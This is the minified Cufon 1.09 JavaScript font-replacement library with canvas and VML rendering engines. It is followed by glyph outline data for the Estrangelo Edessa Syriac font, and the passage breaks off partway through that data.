/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																							   
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 2006 Microsoft Corporation, portions © 2000 Syriac Computing Institute. All
 * Rights Reserved.
 * 
 * Description:
 * Estrangelo Edessa is a Unicode encoded OpenType font file supporting the Syriac
 * script. The font contains TrueType character outlines and has been optimized for
 * display on screen at small sizes, within software user interface elements such
 * as button descriptions and dialog box text. The Syriac letter forms were
 * designed by Paul Nelson and George Kiraz. Some symbols, including numerical
 * symbols are based on the monospaced Courier type design. A redistributable
 * version of this font is available from Beth Mardutho: The Syriac Institute 
 * http://www.bethmardutho.org.
 * 
 * License information:
 * http://www.microsoft.com/typography/fonts
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"63,-124v1,24,-37,29,-45,9v-6,-16,6,-31,22,-31v13,0,22,9,23,22xm63,-21v1,25,-37,30,-45,9v-6,-16,6,-31,22,-31v13,0,22,9,23,22","w":79},{"d":"107,-85r0,-100v-24,30,-49,61,-64,100r64,0xm9,-69v18,-65,63,-117,104,-159r27,0r0,143r33,0r0,26r-33,0r0,59r-33,0r0,-59r-96,0"},{"d":"163,-198r-57,0r0,198r-35,0r0,-198r-57,0r0,-29r149,0r0,29","w":176},{"d":"141,-227r-106,227r-36,0r106,-227r36,0","w":140},{"d":"150,-144r-67,173r-14,54r-34,0r27,-88r-61,-139r37,0r39,101r38,-101r35,0","w":151},{"d":"140,51r-140,0r0,-24r140,0r0,24","w":140},{"d":"60,-131v32,-30,97,-19,97,40r0,91r-34,0v-6,-42,19,-121,-25,-121v-16,0,-28,8,-37,17r0,104r-34,0r0,-227r34,0","w":180},{"d":"152,-144r-54,70r55,74r-38,0r-37,-55r-38,55r-37,0r56,-73r-52,-71r37,0r35,53v11,-19,25,-35,37,-53r36,0","w":155},{"d":"170,-60v-12,12,-26,25,-49,25v-34,0,-50,-24,-50,-61v0,-65,61,-84,122,-66v4,34,-10,84,10,104v29,4,35,-30,35,-59v0,-58,-30,-91,-86,-91v-72,0,-103,45,-108,116v-6,91,90,118,161,85r0,20v-18,9,-40,15,-68,15v-77,-1,-119,-42,-119,-119v0,-85,47,-139,132,-139v72,0,112,42,112,114v0,42,-14,81,-54,81v-20,0,-32,-11,-38,-25xm99,-96v0,48,52,45,68,18r0,-67v-38,-12,-68,9,-68,49","w":280},{"d":"211,-227r-89,227r-35,0r-87,-227r37,0r68,191v20,-67,47,-127,70,-191r36,0","w":210},{"d":"127,-121v-44,-10,-78,10,-75,54v-7,50,52,50,75,26r0,-80xm127,-15v-40,32,-110,14,-110,-51v0,-75,77,-96,143,-73v-5,97,29,229,-79,222v-18,-1,-34,-3,-48,-7r0,-28v16,5,31,7,50,8v38,0,45,-31,44,-71","w":187},{"d":"45,2v9,-39,13,-82,-35,-78r0,-26v25,0,47,-9,41,-36v-9,-36,-8,-82,31,-86v8,-1,16,-3,25,-3r0,23v-39,-1,-22,47,-22,78v0,22,-13,31,-28,38v36,6,26,52,22,88v-2,17,11,26,28,26r0,24v-36,0,-61,-13,-62,-48","w":117},{"d":"145,-188v-29,-19,-110,-22,-90,32v27,36,102,27,102,92v0,69,-90,82,-136,51r0,-35v27,28,120,35,99,-29v-27,-37,-102,-26,-102,-90v0,-61,76,-75,127,-53r0,32","w":173},{"d":"231,-177r-66,177r-31,0r-67,-177r-11,177r-32,0r16,-227r37,0r72,193v21,-67,49,-128,73,-193r38,0r11,227r-32,0","w":298},{"d":"224,0r-34,0r0,-101r-124,0r0,101r-35,0r0,-227r35,0r0,97r124,0r0,-97r34,0r0,227","w":255},{"d":"13,-218v49,-27,137,-9,117,61v-12,40,-60,46,-60,98r-23,0v-18,-60,52,-63,52,-114v0,-44,-63,-30,-86,-14r0,-31xm84,-21v0,32,-47,28,-47,0v0,-28,47,-28,47,0","w":145},{"d":"145,0r-114,0r0,-227r114,0r0,29r-79,0r0,69r79,0r0,29r-79,0r0,71r79,0r0,29","w":167},{"d":"151,-144r-64,144r-27,0r-58,-144r34,0r39,108v12,-37,27,-74,42,-108r34,0","w":152},{"d":"140,-201v-55,0,-81,34,-84,88v-5,72,65,104,126,78r0,-50r-51,0r0,-29r85,0r0,97v-22,13,-50,19,-83,20v-73,-1,-109,-44,-113,-114v-6,-106,116,-146,197,-99r-1,35v-19,-15,-45,-26,-76,-26","w":243},{"d":"205,0r-40,0r-62,-93r-60,93r-42,0r82,-117r-77,-110r41,0r57,86v18,-32,39,-57,58,-86r39,0r-77,108","w":207},{"d":"64,-227v7,80,-28,203,60,202v86,-1,50,-123,57,-202r34,0r0,135v0,63,-32,96,-94,96v-60,0,-91,-33,-91,-93r0,-138r34,0","w":244},{"d":"190,-227r-78,131r0,96r-35,0r0,-95r-77,-132r38,0r57,104v17,-37,39,-69,58,-104r37,0","w":189},{"d":"139,-73v7,-49,-51,-62,-78,-32r0,73v30,23,85,5,78,-41xm173,-73v5,63,-59,91,-112,67r0,89r-34,0r0,-227r33,0r1,13v42,-36,120,-9,112,58","w":190},{"d":"52,-227r-7,87r-25,0r-7,-87r39,0","w":64},{"d":"51,-70v0,53,63,54,92,31r0,27v-48,32,-126,12,-126,-59v0,-68,74,-94,126,-64r0,29v-32,-25,-92,-19,-92,36","w":158},{"d":"101,-227v-60,65,-60,212,0,277r-31,0v-66,-72,-65,-204,0,-277r31,0","w":105},{"d":"66,0r-35,0r0,-227r35,0r0,227","w":97},{"d":"65,-35r-34,82r-26,0v8,-26,16,-52,19,-82r41,0","w":82},{"d":"61,-130v29,-32,96,-20,96,39r0,91r-34,0v0,-52,15,-153,-55,-110v-3,2,-5,4,-7,6r0,104r-34,0r0,-144r33,0"},{"d":"61,0r-34,0r0,-227r34,0r0,227","w":87},{"d":"106,-62r-83,0r0,-30r83,0r0,30","w":129},{"w":74},{"d":"231,-2v-28,12,-67,0,-78,-21v-34,39,-141,37,-136,-37v3,-41,26,-59,56,-72v-26,-37,-11,-103,45,-98v18,2,35,4,46,12r0,29v-18,-16,-74,-26,-70,13v5,47,43,76,63,108v6,-12,13,-23,16,-37r-23,0r0,-26r77,0r0,26r-24,0v-6,22,-17,43,-29,60v12,16,31,27,57,18r0,25xm52,-61v0,48,63,42,84,17r-50,-68v-19,11,-34,22,-34,51","w":248},{"d":"102,-200v-34,-12,-36,23,-33,56r33,0r0,23r-33,0r0,121r-33,0r0,-121r-27,0r0,-23r27,0v-8,-55,15,-99,66,-83r0,27","w":110},{"d":"163,-37r35,-107r35,0r-55,144r-30,0r-31,-99r-31,99r-30,0r-52,-144r34,0r34,107v8,-39,23,-71,33,-107r26,0","w":236},{"d":"9,-31v23,11,48,4,48,-29r0,-167r34,0r0,169v5,49,-39,72,-82,56r0,-29","w":120},{"d":"68,-39v-1,20,21,18,38,15r0,21v-32,15,-72,5,-72,-41r0,-77r-27,0r0,-23r28,0r12,-39r21,0r0,39r40,0r0,23r-40,0r0,82","w":117},{"d":"98,50r-71,0r0,-277r71,0r0,22r-37,2r0,229r37,2r0,22","w":106},{"d":"16,-82r151,0r0,28r-151,0r0,-28xm16,-141r151,0r0,28r-151,0r0,-28"},{"d":"120,-14v-29,31,-96,20,-96,-39r0,-91r34,0v6,43,-18,121,25,121v16,0,28,-9,37,-17r0,-104r34,0r0,144r-33,0"},{"d":"63,-21v1,25,-37,30,-45,9v-6,-16,6,-31,22,-31v13,0,22,9,23,22","w":79},{"d":"213,-89v5,-42,-46,-35,-60,-13v2,32,0,68,1,102r-34,0r0,-89v5,-41,-45,-35,-59,-15r0,104r-34,0r0,-144r33,0r0,14v20,-22,74,-24,87,6v27,-36,100,-32,100,34r0,90r-34,0r0,-89","w":272},{"d":"42,-99r-25,-20r32,-33r-40,-8r8,-30r42,14r-3,-51r33,0r-3,51r42,-14r7,30r-40,8r32,33r-25,20r-30,-39","w":144},{"d":"66,-122v37,2,67,-7,67,-41v0,-34,-32,-35,-67,-35r0,76xm31,-227v67,-1,139,-4,138,62v-1,54,-45,73,-103,73r0,92r-35,0r0,-227","w":184},{"d":"45,-217v7,19,21,36,28,56v-39,0,-48,-33,-66,-56r38,0","w":79},{"d":"126,-26v51,0,72,-35,73,-87v0,-53,-20,-89,-71,-89v-49,0,-72,38,-72,89v0,49,21,87,70,87xm130,-230v69,0,105,45,105,113v0,72,-35,120,-109,120v-69,0,-106,-44,-106,-114v0,-74,37,-119,110,-119","w":254},{"d":"202,0r-45,0r-92,-100r0,100r-34,0r0,-227r34,0r1,100r86,-100r42,0r-100,112","w":201},{"d":"66,-29v73,5,122,-22,122,-89v0,-67,-51,-84,-122,-80r0,169xm31,-227v107,-6,195,9,193,109v-2,98,-83,126,-193,118r0,-227","w":243},{"d":"95,-23v28,0,41,-19,41,-50v0,-31,-13,-48,-41,-48v-28,0,-43,18,-43,49v0,32,15,49,43,49xm96,-148v49,0,74,27,74,75v0,48,-29,76,-78,76v-47,0,-75,-26,-75,-74v0,-51,31,-77,79,-77","w":186},{"d":"50,-42v0,31,47,20,58,4r0,-28v-27,-2,-57,-2,-58,24xm166,-3v-16,11,-52,7,-55,-12v-23,27,-99,26,-96,-26v2,-44,45,-52,93,-48v5,-44,-48,-35,-73,-23r0,-26v43,-19,115,-13,107,48v5,26,-16,76,24,67r0,20","w":168},{"d":"44,-203v13,0,21,6,22,18v0,23,-43,24,-43,0v0,-12,9,-19,21,-18xm61,0r-34,0r0,-144r34,0r0,144","w":87},{"d":"52,-227r-6,87r-26,0r-7,-87r39,0xm118,-227r-6,87r-26,0r-7,-87r39,0","w":131},{"d":"56,